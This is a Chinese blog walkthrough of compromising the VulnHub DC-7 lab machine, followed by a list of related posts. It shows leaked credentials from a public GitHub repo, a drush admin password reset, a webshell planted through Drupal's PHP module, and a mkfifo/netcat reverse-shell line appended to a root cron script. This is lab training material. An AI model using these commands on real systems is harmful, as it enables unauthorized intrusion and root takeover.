vulnhub-DC-7靶机渗透记录

最新推荐文章于 2024-03-27 20:01:53 发布
最新推荐文章于 2024-03-27 20:01:53 发布
阅读量705 收藏
点赞数
分类专栏: 渗透测试 文章标签: php web安全 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nareku/article/details/126714576
版权

准备

kail IP: 192.168.178.162
dc-7 IP :未知

信息收集

nmap -sV 192.168.178.162/24

在这里插入图片描述

发现靶机IP为192.168.178.162,惯例看看还有没有其他开放的端口
访问80端口,发现是drupalCMS
在这里插入图片描述
查看页面给出的提示

欢迎来到DC-7
DC-7引入了一些“新”概念,但是我会让您知道它们是什么。😃
尽管这一挑战并不是技术性的全部,但是如果你需要诉诸于暴力破解或字典攻击,那么您可能不会成功。
您将要做的就是在盒子外面思考。
方式在盒子外面。😃

找了找,在页面下面发现个DC7USER ,在百度搜索@DC7USER后,发现是一个Twitter用户,进入Twitter后搜索这个用户,进入这个用户首页

https://github.com/Dc7User/

点击GitHub的链接发现一个staffdb的源码文件夹,并给了提示这源码是dc7靶机的突破口

在这里插入图片描述
在这里插入图片描述
直接在github上找有没有上面关键信息,分析源码,发现一个config.php文件,在这个配置文件里找到了用户名dc7user和密码MdR3xOgB7#dW
在这里插入图片描述

获取后台账户密码

试了试80端口的登录,发现没有用,那就是ssh登录啦
在这里插入图片描述

发现一个backups文件夹和一个mbox文件,都看看
在这里插入图片描述
打开mbox文件发现是一个计划任务,定时备份,并发现备份执行的源码在/opt/scripts目录下
在这里插入图片描述

进入到/opt/scripts目录下,查看backups.sh脚本文件,发现两个命令gpg和drush(gpg命令用来加密,drush命令是drupal框架中用来做一些配置的命令,它可以改变用户名密码)

在这里插入图片描述

进入到/var/www/html目录下,因为网站会有一个admin用户,所以使用drush命令修改admin用户的密码为123456,发现可以修改成功

drush user-password admin --password=“123456”

反弹shell

登录80端口,刚开始也是向直接在content直接上一句话木马的,但是发现不行,查了查发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入
在这里插入图片描述
这里试了好多次用链接上传都不行,干脆我直接下载压缩包直接上传了
下载地址:

https://www.drupal.org/project/php

在这里插入图片描述
在这里插入图片描述
激活这个模块,并且滑到底部点击Install
在这里插入图片描述
安装成功

在这里插入图片描述

然后对首页面进行编辑
在这里插入图片描述

直接用蚁剑连接,连接成功后还是习惯性在蚁剑终端反弹shell给kail

权限提升

在这里插入图片描述

当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell
在这里插入图片描述

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.178.162 9999 >/tmp/f" >> backups.sh

在这里插入图片描述

kail中开监听,反弹shell之后拿到root权限
在这里插入图片描述

参考:
https://blog.csdn.net/weixin_43583637/article/details/102809227

narukuuuu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件的读写基本操作
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1055
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
DC-7靶机详细渗透步骤
wwxxss
11-04 656
DC7详细的渗透的步骤,它跳出了之前的思维,提供了我们还有源码泄露漏洞,希望大家能理解步骤
DC-7靶场
最新发布
mlws1900的博客
03-27 922
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
Vulnhub内网渗透DC-7靶场通关
qq_35664104的博客
09-01 658
个人博客:DC系列共9个靶场,本次来试玩一下一个 DC-7,。下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。M1请使用UTM进行搭建,教程。
DC-7靶机渗透测试
读书 买花 长大
04-30 362
DC-7
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-7靶机
Flamingo1998的博客
07-17 131
DC-7靶机
vulnhub DC-7 靶机 渗透测试
小松博客
05-28 126
我们打开这个人的界面,发现一个在GitHub上的神秘链接。映入眼帘的就是一个config.php,并且拿到了数据库的账号密码。这个drush 原来是dupal 的命令,具体可以参考这个链接内容。我们查看一下这个backups.sh文件,这个命令很奇怪。执行ls,发现有一个backup文件夹和mbox文件。跳出框框思考,我们在网页下面发现一个神秘代码。拿到shell,查看自己有哪些权限。发现没有php模块,我们自己加一个。等了好几分钟,shell终于到了。端口发现,开放80,22。登陆,进入后台模块管理。
dc-7 靶机渗透学习
..
03-23 3873
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
DC:7靶机-Walkthrough
ins1ght的博客
09-23 2443
目前为止,做过的vlunhub里面的靶机里,这个算是比较开脑洞的了。首先发现网站首页footer部分多出的一个@DC7USER,这与一个未经DIY的Drupal站点的footer展示内容不同,进而通过Google搜索发现了放在Github上的系统登录口令,才有了后续的一系列操作。回忆起之前在某CTF大赛中打酱油的经历,那个时候也有一道Web题目,也是通过放在Github上的一个项目为突破口。历史真是TM惊人的相似……
渗透测试:DC-7靶机
Ciyaso的博客
08-23 264
一、扫描获取靶机ip arp-scan -l 192.168.203.146 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.146 开放22、80端口 2.Wappaloyzer CMS:Drupal 8 Web服务器:Apache 2.4.25 操作系统:Debian 访问网站 提示说不是一个技术问题,无法通过爆破,可以考虑"outside" the box,可以考虑信息收集(社工) 发现一个@用户 @DC7USER 搜索一下发现了一个github用户
DC-7靶机渗透详细流程
braty_的博客
02-07 1491
DC-7靶机渗透详细流程
vulnhub靶机DC-7 渗透笔记
liver100day的博客
06-22 445
靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ 渗透过程 1.信息收集 1.1 信息收集 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 扫描到目标靶机IP地址为:192.168.75.151 也可以使用nmap扫描整个网段,确认存活主机 nmap -T4 192.168.75.0/24 同样扫描出了目标靶机IP
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1066
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值